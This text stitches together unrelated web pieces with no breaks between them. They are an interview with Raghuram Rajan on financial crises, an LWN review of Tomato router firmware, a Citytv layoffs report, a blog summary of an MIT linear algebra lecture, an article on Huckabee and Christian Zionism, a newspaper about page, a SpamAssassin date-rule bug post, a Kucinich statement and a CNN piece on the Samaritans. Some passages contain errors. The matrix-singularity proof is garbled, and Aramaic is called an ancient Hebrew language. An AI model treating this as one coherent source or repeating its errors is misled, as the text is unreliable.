More generally , which sectors of the economy should take on the aggregate risk of the housing sector ?
What role should government play ?
Have you thought about those issues at all ?
Rajan : No .
The answer is no .
I do n’t have deep answers to that .
I do think it ’s a big political issue ; it ’s one area where the politics have overtaken the economics and there has been a tremendous push in the last few years — and certainly there was a push historically also — to try to encourage home ownership , for a variety of reasons .
Let me put it this way :
It seems that there are certain functions that are missing in this area where it would be great if we could have fail - safe private contracts that could emerge .
For example , [ Yale ’s ] Bob Shiller has been talking about housing risk for a long time .
Can we buy contracts which insure you against housing risk ?
That might be a good thing .
And it does n’t seem to me the problems are so dramatic that you need the government to provide that insurance either implicitly or explicitly .
There could be other ways of doing it .
Apart from trying to make sure that some of these contracts actually are created and used , I ’m less persuaded that the government has to play a big role in this sector , because effectively it creates a variety of moral hazard problems .
So I would be happy if the government role was reduced tremendously .
The problem , of course , we have now is the government ’s role is propping up prices , and so any distancing of the government would mean a substantial potential downward blip in prices , which then makes a huge home - owning constituency opposed to any such intervention .
Feldman : Right .
Rajan :
So I think finding ways to slowly disengage the government in a way that you have a smooth change in prices would be a good thing .
But again , as soon as you announce anything of this sort the prices move more abruptly .
CURRENT RESEARCH AGENDA
Feldman :
You talked about the research agenda for macro : figuring out some of the financial details and putting that in models .
What ’s your research agenda now , given the crisis ?
Is it changing what you were working on ?
Rajan :
One thing that I certainly have rethought a lot is , I had the view that countries got into trouble because they did n’t have the right institutional structures .
I was of the view that if you transformed the institutional structures , you could become fairly immune to problems .
I ’m less persuaded of that now .
I think there might be some inherent volatility in financial markets that you really can’t eliminate by creating more transparency , by creating the right structures and so on .
These things will take on a life of their own .
So you have to focus on creating more resilience in the economies .
You ca n’t eliminate the financial markets ; you need them , especially as you get more sophisticated .
But you need to create more resilience .
Feldman :
So , things like a resolution regime , contingent capital …
Rajan :
And a variety of markets and institutions so there ’s more buffering .
You ca n’t ward off these problems .
You ca n’t anticipate them .
I ’ve been reading [ UC Berkeley political scientist Aaron ]
Wildavsky recently .
The guy wrote about it in the 1980s :
How do you deal with these kinds of risks ?
A lot of what he said makes sense , which is if you try to protect the system too much , then you make it incapable of dealing with risk .
One example of this is the rating system , right ?
The financial system became excessively reliant on something it thought was failure - proof , which was the rating system .
By the time we found out that it was n’t failure - proof , so many people were relying on it , it became a systemic risk .
So there is a problem where the system becomes less varied and overly confident about safety and in the process creates tremendous risk of its own .
This crisis is — pardon me for saying so — sort of a full employment act for economists [ laughter ] , and we will keep working on these things for a long time to come .
I have no doubt that our research agendas will change .
Personally , apart from the stuff on banking , I am working on trying to think about the metapicture .
Why did the system go wrong ?
Not just thinking about the financial system , but what were the political forces , what were the structural forces creating this ?
That ’s a book project which comes out , hopefully , this spring — but I ’ve got to work on it .
The title is Fault Lines : The Hidden Cracks that Still Threaten the World Economy .
Feldman :
And it ’s around these issues of diversity , the things you ’ve just talked about ?
Rajan :
No , those are the details .
I want to go back to how the macroeconomy runs .
Why is it that the U.S. is focused so much on consumption ?
Why have our policies pushed credit ?
Why , for example , has the U.S. safety net not worked as well as it did in the past ?
Why is it that stimulus , both monetary and fiscal , is so much stronger in the U.S. than in other countries ?
And then how does this relate to what the rest of the world is doing ?
So , link it back together to , “ Here is the gap , the fault line .
How do we bridge that ? ”
Feldman :
That is an ambitious project .
You ’re not resting on your laurels .
Rajan : No , no .
The financial sector is somewhere in there , but it ’s more about the big picture .
Feldman :
Is there anything else that you ’d like to add right now ?
Rajan :
No , no , this has been very good .
We ’ve covered a lot .
Feldman :
Thank you very much .
More About Raghuram Rajan
Current Positions Eric J. Gleacher Distinguished Service Professor of Finance , Booth School of Business , University of Chicago , since 2006 ; on faculty since 1991
Economic Adviser to the Prime Minister of India , since 2008 Previous Positions Chair , High Level Committee on Financial Sector Reforms , India , 2007–08
Economic Counselor and Director of Research , International Monetary Fund , 2003–06
Fischer Black Visiting Professor , Sloan School of Management , Massachusetts Institute of Technology , 2000 –01
Visiting Professor of Finance , Kellogg School , Northwestern University , 1996–97
Bertil Danielsson Visiting Professor of Banking , Stockholm School of Economics , 1996 – 97 Professional Activities Program Director ( Corporate Finance ) , National Bureau of Economic Research , since 1998
Director , American Finance Association , 2001–04
Founding Member , Academic Council , Indian School of Business
Member , International Advisory Board , Indian Institute of Management
Member , Advisory Board of the Comptroller General of the United States
Consultant : Finance Ministry , Government of India ; World Bank ; International Monetary Fund ; Federal Reserve Board ; Swedish Parliamentary Commission ; various financial institutions Honors and Awards Inaugural Fischer Black Prize ( for the person under 40 who has contributed the most to the theory and practice of finance ) , American Finance Association , 2003
Numerous awards for best paper from the Journal of Finance , Journal of Financial Economics and Review of Financial Studies , 1992 –2006 Publications Co-author ( with Luigi Zingales ) of Saving Capitalism from the Capitalists , 2003 ; author of over 60 research papers on banking , financial development , economic growth , firm structure and corporate governance Education Massachusetts Institute of Technology , Ph.D. , 1991
Indian Institute of Management ( Ahmedabad ) , M.B.A. , 1987
Indian Institute of Technology ( Delhi ) , B.Tech . ( Electrical ) , 1985
Endnotes
1 Calomiris , Charles W. , and Kahn , Charles M. “ The Role of Demandable Debt in Structuring Optimal Banking Arrangements . ” American Economic Review , June 1991 , 497–513 .
2 “ Has Financial Development Made the World Riskier ? ” Proceedings of the Jackson Hole Conference organized by the Kansas City Fed , 2005 .
3 Bellman , Eric .
“ Indian Firms Shift Focus to the Poor . ” Wall Street Journal , print version , Oct. 20 , 2009 .
Online version , Oct. 21 , 2009 .
4 An informal distinction between schools of economic thought according to whether they favor or discourage government intervention in free markets .
Saltwater schools ( near the oceans ) such as Harvard , MIT and UC Berkeley , are said to fall in the interventionist camp .
Freshwater schools ( near the Great Lakes ) such as the Universities of Chicago and Minnesota , are said to prefer free market solutions .
The Grumpy Editor 's Tomato review
LWN .net needs you !
Without subscribers , LWN would simply not exist .
Please consider signing up for a subscription and helping to keep LWN publishing
Your editor has just completed an important transition : moving his Internet connectivity from one evil branch of the local telecom duopoly to the other , equally evil branch .
This change required the acquisition of a new router ; that , in turn , provided the opportunity to play with Linux - based router software , and Tomato in particular .
Read on for your editor 's impressions of this impressive bit of ( mostly ) free software .
Tomato has its roots in the original Linksys WRT54G firmware .
This firmware was first distributed as if it were proprietary software , but Linksys , under heavy GPL - enforcement pressure , eventually made the source available under the GPL .
The existence of this source , along with the ease by which the Linksys routers could have new firmware installed , led to the creation of a number of firmware distributions , all of which added new features and otherwise improved on the original Linksys offering .
Over time , Linksys ( Cisco ) has incorporated some of these improvements ; the company also continues to offer a special version of its basic household router ( the WRT54GL ) which is explicitly designed to allow firmware replacement .
If a company is going to make a competitively - priced , Linux - based , user - hackable router , your editor feels an obligation to buy it .
That choice is easy , but the choice of which replacement firmware to use is harder .
There 's a wide variety of offerings , including OpenWrt , DD - WRT , FreeWRT , and Tomato .
There appears to no easy way to pick one in particular ; your editor started with Tomato because the screen shots looked nice and the installation instructions were straightforward .
On the other hand , OpenWRT 's installation instructions are simply missing ( though some information is available on the OpenWRT wiki ) , and those for DD - WRT are lengthy and intimidating , making the process look similar to installing Gentoo .
The funny thing , of course , is that installing replacement firmware on a WRT54GL router is a trivial task : download firmware , go to the router 's " upgrade firmware " screen , and upload the new blob .
Two minutes later the job is done .
Your editor 's first impression of Tomato is that it is great stuff - though reflection yields some concerns which will be discussed below .
Tomato brings a whole range of new functionality to a cheap consumer device , yielding a degree of visibility into and control over the network which your editor has never had before .
The web - based interface is slick - if JavaScript heavy - and mostly easy to use .
It would have been nice to bring this device into the house some time ago , even if Evil Telecom # 1's network did not require its presence .
One nice feature is simple bandwidth monitoring and display ; there are a number of plots which can be brought up and watched in real time .
The router is also able to store network statistics for a long period of time and produce plots on daily , weekly , or monthly scales .
The only problem there is that the hardware lacks the storage for this amount of data ; Tomato can work around that little limitation by using a built - in CIFS client to use storage found elsewhere on the net .
The Linux kernel has the facilities to exercise a great deal of control over the processing of network traffic .
There is simple firewalling , of course , with the ability to decide which traffic is worthy of passage and which should be denied .
But there is also an extensive traffic control subsystem allowing the user to prioritize the use of the available bandwidth .
That feature is arguably underused because it takes a while to figure out how to configure it with the available command - line clients .
Tomato provides a relatively straightforward mechanism for the creation of both access control and quality - of - service rules .
On the access control side , Tomato has a screen which allows the creation of rules for specific addresses and port numbers .
Rules can be global , or they can apply only to traffic from specific machines on the local network .
Rules can have a schedule attached so that , say , distracting web sites can be blocked during the day - encouraging accomplishment - while serious sites can be blocked at night - encouraging relaxation .
Specific systems can be blocked from the net entirely on a schedule , a potentially useful feature for parents who have long since given up on trying to keep wireless - enabled devices out of the kids ' rooms late at night .
Interestingly , Tomato does not stop with port - based restrictions ; it also incorporates the L7 - filter and IPP2P classifiers .
Both modules are essentially deep packet inspection implementations , allowing the classification ( and , thus , control ) of traffic based on a look at the actual bits passing through .
With L7 - filter , for example , an administrator can block specific role - playing games , regardless of whether the official servers or ports are being used .
There 's a vast set of canned rules , enabling control of various instant messaging protocols , file formats , and more .
It is now possible to block the downloading of Perl scripts - something which , while tempting , is probably unwise to actually do .
IPP2P , instead , is more directly focused on the detection of peer - to - peer protocols .
Together , they are a control freak 's dream ; network neutrality stops at the local router .
Even if a network administrator does not wish to ban , say , role - playing games outright , there is value in saying that such uses of the network should not interfere with real work like reading XKCD .
That 's where the quality of service ( QOS ) screens come in .
QOS is a two - step process : dividing the available bandwidth among various classes of traffic , and assigning specific types of traffic to those classes .
Tomato provides ten different classifications , each of which has a priority and a guaranteed bandwidth portion - all of which can be changed , of course .
By default , only outbound ( to the wide - area network ) traffic is subject to control ; it is possible to control inbound traffic , but , since that traffic has already passed over the WAN link by the time the router can work with it , there 's usually little point .
Classification rules look a lot like access control rules , allowing the use of addresses , port numbers , or classification by IPP2P or L7 - filter .
With all this , the administrator can decree that , say , a certain proprietary role - playing game favored by the children is a very low priority stream - but it still gets a few percent of the available bandwidth so the kids do not suffer permanent trauma as a result of lag - induced fragging .
Tomato can also generate pie charts showing ( by classification ) how bandwidth is being used currently ; clicking on a classification yields a list of current connections .
All told , it 's a capable and easy - to - use way of ensuring that the network functions well even under heavy use .
Other features abound .
There is a DHCP server , of course , along with a nice screen for doing static DHCP assignments without ever having to type a MAC address .
The router can report its globally - visible address to a wide variety of dynamic DNS services .
Incoming connections can be forwarded to internal machines in a flexible way .
There is a " triggering " mechanism which automatically opens specific incoming ports in response to specific outgoing connections .
Old - timers will see triggering as a way to support the full FTP protocol ; everybody else will use it to enable incoming BitTorrent connections .
And so on .
It is , to say the least , a highly capable system .
The biggest operational problem your editor has experienced is the occasional dropping of long - lived SSH connections .
A bit of research led to the tweaking of a few of the rather intimidating array of connection tracking parameters , and things would appear to have improved .
There are a couple of more general concerns , though .
Like many of its peers , Tomato appears to be well past its active development phase ; there were a few releases in 2009 , but they did not make a great many changes .
Meanwhile , its 2.4.20 kernel is rather far back from the leading edge , and both L7 - Filter and IPP2P are explicitly unmaintained .
Given the steady stream of security updates for protocol dissectors in WireShark , your editor has a hard time believing that these other classifiers can be completely free of security issues .
But there is nobody maintaining them , and Tomato has no apparent means for the monitoring of security problems or the distribution of updates .
Given that these routers are directly exposed to the net and are the first line of defense for many networks , the combination of ancient software and no security support is worrying .
Tomato is also not 100 % free software .
The core Linux system is , of course , free , but the user interface code carries a " for use with Tomato only " copyright notice .
There is also the issue of the proprietary Broadcom network driver , but that 's a problem any 2.4 - based firmware for this router will have .
These concerns are strong enough that , despite Tomato 's many qualities , your editor is not yet sure that he has found the final distribution for his router .
In particular , OpenWRT - which offers a 2.6 kernel , a seemingly larger and more active development team , release notes with CVE numbers included , and a packaging system allowing others to add features to the router - seems worth a detailed look .
The good news is that this choice exists and is easy to execute .
That , in turn , is the result of the GPL and the developers who made an effort to enforce it .
Citytv is cutting shows , production staff and on - air talent including veteran CityNews at Six anchor Anne Mroczkowski .
In a statement , Leslie Sole , chief executive of Citytv parent company Rogers Media Television , said the changes “ are necessary to align our operations with the economic and regulatory realities of our industry . ”
According to Koreen Ott , director of marketing and public relations for Rogers Media Television , in Toronto , the noon news program , CityNews at 5 and weekend newscasts have all been cancelled .
“ This is about restructuring our television operations to retrench and rebuild , ” says Ott . “ It affects our Citytv stations in Toronto , Calgary , Edmonton and Vancouver ... and [ the cuts amount to ] six per cent of our workforce across the country . ”
The layoffs are effective immediately and she says “ there are no additional proposed layoffs at this time . ”
In the statement , Citytv said shows Breakfast Television and CityLine , and CityNews at Six and CityNews at Night will continue to air in Toronto .
A story posted on Citytv ’s website says Mroczkowski was laid off after Monday evening ’s broadcast and the rest of the staff were told Tuesday morning .
One version of the story posted in the late afternoon said many staff were “ crying ” but that sentence was later deleted .
Ott would n't comment on other staff cuts but the story on Citytv 's website lists the " remaining on - air staff " and they do n't include : Lara Di Battista , Pam Seatle , Farah Nasser , Marianne Dimain , Merella Fernandez , and Michael Serapio .
On Tuesday afternoon , the online biographies for those eight broadcasters were all removed from the website .
Mroczkowski had worked there for 23 years .
Di Battista and Seatle are both also veterans .
An unknown number of production staff were also laid off .
According to the Communications , Energy and Paperworkers Union , representing many Citytv staff , laid off were 6 on - air people plus 29 full - time and 7 part - time employees , including directors , production assistants , graphic people , editors , camera people , and one Live - Eye worker .
Rogers Media purchased five Citytv stations across Canada for $ 375 million in 2007 from CTV , which acquired the ChumCity empire and had to divest itself of the stations due to media ownership regulations not allowing the same company to own two stations in the same market .
“ This is the death of local news , ” said one former Citytv employee .
“ If Rogers , which has money is doing this , then what do you think we can expect from the other networks ? ”
The mood inside the Rogers building was grim , as most employees were fearful for their jobs .
“ It ’s just awful , ” said one employee who was not part of the cuts .
“ Basically , ever since Ted Rogers died , so did the vision of Citytv as a national network player .
Nobody has any vision .
The bean counters have taken over and they want to turn us into Omni 3 . ”
The purchase of Citytv was a signal change for Rogers , which is much better known for providing the cable signal than actually running TV stations .
Its previous experience with broadcasting was with community programming stations , and it ’s Omni brand of multicultural stations , which are both much cheaper to run than full fledge TV stations , that buy content from U.S. networks .
As well , with only five stations in big cities across Canada , the Citytv brand was much smaller compared to the national coverage of its competitors , CTV and Global .
This is at least the second round of cuts in the media division , with 100 jobs lost in December 2008 .
In November , the cable giant also laid off about 900 employees , mainly in its cable and wireless divisions , in November .
Citytv Toronto has lost a number of on - air personalities over the past year including former anchors Peter Silverman and JoJo Chintoh .
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
The other interesting dynamic is that Rogers is in a protracted fight with broadcasters over fee - for - carriage .
The broadcasters have been petitioning the CRTC to allow charging for local television cable , resulting in “ Local TV matters ” and “ Save local TV ” campaigns .
“ We believe in local television , ” said Jamie Haggarty , EVP Television Operations , Rogers Media Television in a press release .
“ We remain committed to innovation and development of our stations to increase our impact on our local markets .
We will focus on quality over quantity . ”
As well , in December , Rogers received a license to run 24 - hours all news channel from the CRTC .
It is unaware how these cuts will affect that as yet created station .
This is the third post in an article series about MIT 's Linear Algebra course .
In this post I will review lecture three on five ways to multiply matrices , inverse matrices and an algorithm for finding inverse matrices called Gauss - Jordan elimination .
The first lecture covered the geometry of linear equations and the second lecture covered the matrix elimination .
Here is lecture three .
Lecture 3 : Matrix Multiplication and Inverse Matrices
Lecture three starts with five ways to multiply matrices .
The first way is the classical way .
Suppose we are given a matrix A of size m x n with elements a ij and a matrix B of size n x p with elements b jk , and we want to find the product A·B .
Multiplying matrices A and B will produce matrix C of size m x p with elements .
Here is how this sum works .
To find the first element c 11 of matrix C , we sum over the 1st row of A and the 1st column of B .
The sum expands to c 11 = a 11 ·b 11 + a 12 ·b 21 + a 13 ·b 31 + ... + a 1n ·b n 1 .
Here is a visualization of the summation :
We continue this way until we find all the elements of matrix C . Here is another visualization of finding c 23 :
The second way is to take each column in B , multiply it by the whole matrix A and put the resulting column in the matrix C .
The columns of C are combinations of columns of A . ( Remember from previous lecture that a matrix times a column is a column . )
For example , to get column 1 of matrix C , we multiply A·( column 1 of matrix B ) :
The third way is to take each row in A , multiply it by the whole matrix B and put the resulting row in the matrix C .
The rows of C are combinations of rows of B. ( Again , remember from previous lecture that a row times a matrix is a row . )
For example , to get row 1 of matrix C , we multiply row 1 of matrix A with the whole matrix B :
The fourth way is to look at the product of A·B as a sum of ( columns of A ) times ( rows of B ) .
Here is an example :
The fifth way is to chop matrices in blocks and multiply blocks by any of the previous methods .
Here is an example .
Matrix
A gets subdivided in four submatrices A 1 A 2 A 3 A 4 , matrix B gets divided in four submatrices B 1 B 2 B 3 B 4 and the blocks get treated like simple matrix elements .
Here is the visualization :
Element C 1 , for example , is obtained by multiplying A 1 ·B 1 + A 2 ·B 3 .
Next the lecture proceeds to finding the inverse matrices .
An inverse of a matrix A is another matrix , such that A - 1·A = I , where I is the identity matrix .
In fact if A - 1 is the inverse matrix of a square matrix A , then it's both the left - inverse and the right inverse , i.e. , A - 1·A = A·A - 1 = I .
If a matrix A has an inverse then it is said to be invertible or non-singular .
Matrix
A is singular if we can find a non -zero vector x such that A·x = 0 .
The proof is easy .
Suppose A is not singular , i.e. , there exists matrix A - 1 .
Then A - 1·A·x = 0 · A - 1 , which leads to a false statement that x = 0 .
Therefore A must be singular .
Another way of saying that matrix A is singular is to say that columns of matrix A are linearly dependent ( one ore more columns can be expressed as a linear combination of others ) .
Finally , the lecture shows a deterministic method for finding the inverse matrix .
This method is called the Gauss - Jordan elimination .
In short , Gauss - Jordan elimination transforms augmented matrix ( A|I ) into ( I|A - 1 ) by using only row eliminations .
Please watch the lecture to find out how it works in all the details :
Topics covered in lecture three :
[ 00:51 ]
The first way to multiply matrices .
[ 04:50 ]
When are we allowed to multiply matrices ?
[ 06:45 ]
The second way to multiply matrices .
[ 10:10 ]
The third way to multiply matrices .
[ 12:30 ]
What is the result of multiplying a column of A and a row of B ?
[ 15:30 ]
The fourth way to multiply matrices .
[ 18:35 ]
The fifth way to multiply matrices by blocks .
[ 21:30 ]
Inverses for square matrices .
[ 24:55 ]
Singular matrices ( no inverse matrix exists ) .
[ 30:00 ]
Why singular matrices can't have inverse ?
[ 36:20 ] Gauss - Jordan elimination .
[ 41:20 ] Gauss - Jordan idea A·I -> I· A - 1 .
Here are my notes of lecture three :
My notes of linear algebra lecture 3 on the matrix multiplication and inverses .
The next post is going to be about the A=LU matrix decomposition ( also known as factorization ) .
Mike Huckabee won the Values Voter Summit ’s presidential straw poll this weekend , comfortably outpacing both Sarah Palin and Mitt Romney .
A month earlier the Fox News host and former Arkansas governor made his ninth trip to Israel .
The first trip ( or pilgrimage , rather ) was in 1973 when , as a young Baptist minister , he was caught up in the emerging Christian Right ’s enthusiasm for Israel .
Thirty - six years later , the flirtation between the Christian Right and the Israeli Right has blossomed into a long - term relationship .
Evangelical Christian Zionists now call for unconditional support of the Israeli Right and its Settler Movement , even when that movement is in opposition to the policies of the Israeli government .
Huckabee ’s three - day visit was spent in support of the Settler Movement ’s most extreme elements , including the “ hilltop youth , ” young settlers who have established outposts that their own government has declared illegal .
Even Prime Minister Benjamin Netanyahu , head of the Likud Party , has promised the American government that he would dismantle some of these “ hilltop outposts . ”
At the long - established settlement of Har Bracha , situated on a hill that looks out over the West Bank city of Nablus ( Biblical Shechem ) , Huckabee exchanged views with one of the settlement ’s leaders , Rabbi Eliezer Melamed .
On hearing of Huckabee ’s presidential aspirations , the Rabbi said “ We hope that under Mike Huckabee ’s presidency , he will be like Cyrus and push us to rebuild the Temple and bring the final redemption . ”
The Rabbi was referring to the Biblical account in Second Chronicles which tells of Cyrus , King of Persia and his proclamation that with the fall of Babylon the exiled Jews be allowed to return to Zion .
This account , with its message of hope , serves as the closing section of the Hebrew Bible
Mike Huckabee is not the first American politician to invoke the name of Cyrus , King of Persia .
In 1948 , President Truman , keeping with American public opinion , granted Israel diplomatic recognition despite the protestations of many senior officials in the US State Department , Secretary of State George Marshall among them .
Though historians are divided on the reasons for Truman ’s decision , they are agreed that among the deciding factors was Truman ’s sincere belief in the accuracy and historicity of biblical narrative and prophecy .
In 1953 , only a year after he left the presidency , Truman affirmed explicitly his biblical understanding of the United States ’ recognition of Israel .
In a conversation at New York City ’s Jewish Theological Seminary , the rabbinical school of Conservative Judaism , Truman was introduced as “ the man who helped create the State of Israel . ”
Truman said in response .
“ What do you mean helped create ?
I am Cyrus , I am Cyrus . ”
As a consequence of Cyrus ’ proclamation and the subsequent ‘ Return to Zion ’ the Second Temple was built , standing for four centuries before its destruction at the hands of the Romans in 70 CE .
Rabbi Melamed and some of his colleagues in the Settler Movement believe that they are obligated and destined to build the Third Temple , a structure that would replace the mosques on the Temple Mount ( Haram al Sharif to Muslims ) .
In the Settler rabbis ’ view , “ President Huckabee ” would support the movement to build a Third Temple in Jerusalem .
In this supposition , Rabbi Melamed is well - informed .
For among Huckabee ’s wealthiest and most influential supporters are ardent Christian Zionists Tim and Beverly LaHaye .
Tim LaHaye , co-author of one of the greatest bestsellers in history , the Left Behind series , has endorsed Huckabee ’s presidential plans .
In the series ’ extensive supplemental materials ( videos , kids ’ workbooks , theological tracts ) the building of the Third Temple is a key element ; for only then can the events of the End Times unfold as outlined in the book of Revelations .
As we can see from Harry Truman ’s enthusiastic endorsement of the modern ‘ Return to Zion , ’ Christian religious beliefs have , as far back as 1948 , played a significant part in US support for Israel .
In the period from 1948 to the mid ’ 70s , when both the United States and Israel were led by governments with secular democratic agendas , the ‘ Cyrus idea ’ was present , if somewhat muted .
The confluence of the George W. Bush presidency and a rightward shift in the Israeli government meant that visions of the Third Temple were no longer thought of as metaphorical .
And although supporters of the ‘ Temple Mount Faithful ’ still constitute a very small percentage of Israeli Jews , their numbers are increasing rapidly .
Until recently , leaders of the organized American Jewish Community were wary of a Huckabee presidential candidacy .
His 2008 description of himself as a “ Christian leader ” raised hackles at both the American Jewish Committee and the Anti-Defamation League .
Abe Foxman , director of the ADL , wrote an open letter to Huckabee in which he stated that “ we presume you seek the presidency in order to be the leader of all Americans , regardless of the faith they hold . ”
But that was before the election of Barack Obama and the spread of the perception that the current administration is “ anti- Israel ” for , among other things , putting undue pressure on the Israeli government to freeze building activity in the Territories .
As the American Jewish leadership moves to the political right — in sync with the Likud government of Benjamin Netanyahu — Huckabee may find his approval level rising .
The United States ’ relationship with Israel will again be a factor in the presidential election , perhaps even more so than in 2008 ; or as Time put it recently , this may have been Huckabee ’s “ first 2012 campaign stop . ”
The Yellowstone County News has been publishing a weekly newspaper since 1976 .
* We ’re OPEN !
Call , text or email .
You can call our office at 406-348-2650 or call Jonathan on his cell phone at 406-672-5941 in the meantime for stories , advertising , legal notices and more !
Thank you for your support of Yellowstone County News !
We primarily serve the Yellowstone County , Montana area ( Lockwood , Huntley Project , Billings , Shepherd , Laurel and surrounding areas , ) .
We publish weekly news covering the Yellowstone County Commissioners and county news along with our school districts and local district monthly meetings .
We do have some state and national news in our paper but our main focus covers weekly , Hyper-local news with the local views in Yellowstone County .
Check out our weekly classifieds section that is published each week in the paper as well as uploaded online .
If you ’d like to learn more about us , check out our masthead , and if you need to reach us , use the contact page or check out our advertising options for you .
Give us a call at 406-348-2650 if you have any questions .
Yellowstone County News
Weekly News , Local Views !
add more info here
kcufem Member since Dec 29 , 2008 .
Last seen online 11 months , 3 weeks ago .
/
You have no images for now .
I use SpamAssassin to filter the spam out of my incoming email .
Last night I noticed that a legitimate email had a particularly high spam score .
On further investigation I found that a rule named FH_DATE_PAST_20XX was triggering :
* 3.2 FH_DATE_PAST_20XX
The date is grossly in the future
I checked the Date header of the email and it looked totally fine to me .
It had just changed from the year 2009 to the year 2010 .
Could that be a coincidence ?
A quick look in /usr / share / spamassassin/72_active.cf turned up the rule :
header FH _DATE_ PAST_20XX Date =~ /20 [ 1 - 9 ] [ 0 - 9 ]/ [ if-unset : 2006 ]
Oops .
That regex matches on any year between 2010 and 2099 .
I googled for the rule and came across this :
http://wiki.apache.org/spamassassin/Rules/FH_DATE_PAST_20XX
In the comments it mentioned the problem which I found : Note : the current rule in 3.2 will start matching legitimate dates from 2010 - 01 - 01 .
See issue # 5852 . 
Looking at issue 5852 , the problem was first identified on 2008 - Nov-05 and was fixed in CVS on 2009 - Jun - 30 .
I ’m using the standard stable Debian package which does n’t contain this fix yet so I had to stick the following in my local .cf file to apply a score of 0 to it :
score FH_DATE_PAST_20XX 0.0
I think a lot of systems will be experiencing false positives on their ham because of this at the moment .
It is a particularly high scoring rule considering that the default threshold is 5.0 .
As I understand it , rules are n’t distributed with SpamAssassin as of the next version ( 3.3 ) so hopefully problems like this wont happen in future .
The fix which was supplied for this problem five months ago was to update the regex so it matches 2020 - 2099 instead .
You can read the thread I started about this issue on the SpamAssassin users list here .
It ’™s the one started at Fri , 01 Jan 2010 00:57:37 GMT  with the subject line “ FH_DATE_PAST_20XX ”
WASHINGTON - Following a speech on the Floor of the House of Representative , Congressman Dennis Kucinich ( D - OH ) today made the following statement :
" America is in the fight of its life and that fight is not in Afghanistan -- its here .
We are deeply in debt .
Our GDP is down .
Our manufacturing is down .
Our savings are down .
The value of the dollar is down .
Our trade deficit is up .
Business failures are up .
Bankruptcies are up .
" The war is a threat to our national security .
We 'll spend over one $ 100 billion next year to bomb a nation of poor people while we reenergize the Taliban , destabilize Pakistan , deplete our army and put more of our soldiers ' lives on the line .
Meanwhile , back here in the USA , 15 million people are out of work .
People are losing their jobs , their health care , their savings , their investments , and their retirement security .
$ 13 trillion in bailouts for Wall Street , trillions for war ; when are we going to start taking care of things here at home ? "
###
Amid conflict , Samaritans keep unique identity
By Dana Rosenblatt ( Special to CNN )
HOLON , Israel ( CNN ) -- Every Thursday , Benyamim Tsedaka prepares for his weekly visit to the West Bank for the Sabbath .
Armed with coffee mug and cell phone , the newspaper editor departs his home in Holon for the lush hills of Mount Gerizim , near Nablus .
There , he 'll gather with friends and family and relinquish his casual button - down shirt and jeans to don the flowing white robe and red headdress that is traditional to the Samaritan Sabbath .
Despite their ties to both sides of the border that separates Israel and the Palestinian territories , Tsedaka and the people in his community are a distinct group , neither Jewish nor Arab .
They are Samaritans , members of a culture whose roots also reach back into Biblical times .
Samaritans are descendants of the ancient Israelites who broke from Judaism some 2,200 years ago and were centered mainly in and around the region of Samaria -- now a part of the West Bank .
Even today , many people associate the group with the parable of the " Good Samaritan " from the New Testament , and the term is often used to describe a person who helps another unselfishly .
In modern times , as they try to maintain their distinct cultural identity , the Samaritans find themselves caught in the middle of the decades - long conflict between Israelis and Palestinians .
" We are in the heart of the problem , trying to find ways to exist with both , " says Tsedaka .
Their community numbers less than 700 people and is split almost evenly between the Palestinian controlled area of Mount Gerizim in the West Bank and the Israeli town of Holon near Tel Aviv .
The Samaritans are Israeli citizens and recognized as Jews according to the law of return .
Yet , those who live in the West Bank also are represented in the Palestinian legislature .
Palestinians commonly refer to them as " Jews of Palestine . "
Overall , they seek to maintain neutrality between both sides .
As a people , they are united by a common religion , tradition and language .
They are one of a few remaining cultures that speak , read and write the ancient Hebrew language Aramaic .
They have vowed to keep the language and culture alive for centuries to come , though they speak modern Hebrew and Arabic in daily conversation .
In fact , Aramaic is one of four languages -- along with Arabic , modern Hebrew and English -- that are used in Tsedaka 's community newspaper , A.B. - The Samaritan News , which he edits and publishes every two weeks .
Neither Jew nor Muslim
The religious practices followed by Samaritans are closely related to Judaism .
Although their calendar is slightly different from the Jewish calendar , they celebrate Yom Kippur ( the day of atonement ) and Passover , traditionally marked by the sacrifice of a lamb at Mount Gerizim .
Unlike the Jews , however , the Samaritans do not celebrate Hanukkah or Purim .
Religious ceremonies are led by a Samaritan high priest and recited in Aramaic .
Despite their acceptance by both the Israelis and Palestinians , the Samaritans have not been untouched by the troubles in their native land .
Before the first Palestinian intifada broke out in 1987 , a small number of Samaritans lived comfortably alongside the Palestinians in Nablus .
A year after the uprising , they sought the nearby refuge of Mount Gerizim , the place where , according to the Bible , Abraham prepared to sacrifice his son .
Still , Nablus remains the cultural and economic center for the Samaritans of Mount Gerizim .
There , they attend public schools and universities , and hold positions in the Palestinian ministry .
" The Samaritans of Nablus are Palestinian citizens , with the same rights and obligations , " says Ghassan Shaka , mayor of Nablus .
" They are part of us ... the same feelings , the same hopes , and the same destiny . "
In 1996 , Palestinian Authority President Yasser Arafat granted the Samaritans a seat on the 88 - member Palestinian Legislative Council .
At the same time , because they are Israeli citizens , the Samaritans from Holon are required to serve in Israel 's military , a calling many of them heed with pride .
" A lot of people try not to serve in the Israeli army .
But you will not find any of those to be Samaritan , " says Tsedaka , whose 18 - year - old son serves in the Israel Defense Forces .
" For us it is a great honor . "
Though they acknowledged the irony of holding a Palestinian legislative seat while many of their members also serve in Israel 's army , the Samaritans were keen to accept the offer .
" We do n't ask why .
...
When he [ Arafat ] first mentioned the idea ... we were happy to , " Tsedaka says .
A people divided
The Samaritans of Mount Gerizim are faced with the toughest challenges , says Daphna Tsimcchoni , a researcher at the Truman Institute for Peace at Hebrew University in Jerusalem .
" In the West Bank , they are caught between the Israeli army and the Palestinian population .
They must remain neutral in the face of Palestinian and Israeli politics , differentiating from the two sides , and also their neighbors , Jewish settlers . "
Entrance to the Samaritan synagogue in Holon , decorated with a menorah and Aramaic script .
The Jewish settlement of Bracha , next to the Samaritan neighborhood , has been the target of several attacks from Palestinian militants .
Israel maintains a constant military presence in the area to ensure the security of the settlement and monitor Palestinian movement in and out of Nablus .
The Israeli military says the Samaritans pose no threat to the area and even serve as a peaceful buffer .
But for the Samaritans , living in a militarized zone is not without hardship .
" The Samaritans know the value of having the IDF there , but on the other hand , " says Tsedaka , " They are suffering from the situation . "
Samaritans say the tanks have destroyed the sanctity of their neighborhood , making life unbearable .
" No one will help us , " says Joseph Cohen , a Samaritan of Mount Gerizim .
" The tanks remain in our front yard , and create dust and mess .
When it rains , the mud is so bad , our children can't even go to school . "
Beyond the inconvenience , transit through the Green Line , the border that separates Israel from the West Bank , can prove perilous , as Cohen lived to tell .
Last year , the father of three took an alternate route home on a road to Bracha .
